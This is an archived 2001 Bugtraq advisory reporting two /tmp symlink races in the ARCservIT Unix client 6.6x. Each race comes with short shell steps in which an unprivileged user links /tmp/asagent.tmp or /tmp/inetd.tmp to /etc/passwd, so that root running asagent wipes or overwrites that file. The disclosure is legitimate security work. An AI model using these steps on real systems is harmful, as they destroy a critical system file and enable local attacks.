Home page logo
/

bugtraq logo Bugtraq mailing list archives

tmp-races in ARCservIT Unix Client
From: Jonas Eriksson <je () sekure net>
Date: Fri, 18 May 2001 11:10:31 +0200 (CEST)


Hi,

Computer Associates ARCservIT Client version 6.6x has atleast two /tmp
races, as following:

Vulnerability #1
-----------------

This tmp-race only works if the asagent client never been executed
before.

As user:

je () boxname~> ln -s /etc/passwd /tmp/asagent.tmp

And root:

root () boxname# /usr/CYEagent/asagent start
CA Universal Agent ADV v1.39 started on openview SunOS 5.8
Generic_108528-07 sun4u

ARCserveIT Universal Agent started...

Then,

je () boxname~> ls -la /etc/passwd
-r--r--r--   1 0        sys            0 May  9 11:59 /etc/passwd


Vulnerability #2
-----------------

As user:

je () boxname~> ln -s /etc/passwd /tmp/inetd.tmp

And root:

root () boxname# /usr/CYEagent/asagent inet add

Then,

je () boxname~> cat /etc/passwd
asagentd 6051/tcp # ARCserve agent
asagentd 6051/udp # ARCserve agent


Computer Associates has been informed.


Regards
Jonas Eriksson


  By Date           By Thread  

Current thread:
  • tmp-races in ARCservIT Unix Client Jonas Eriksson (May 18)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]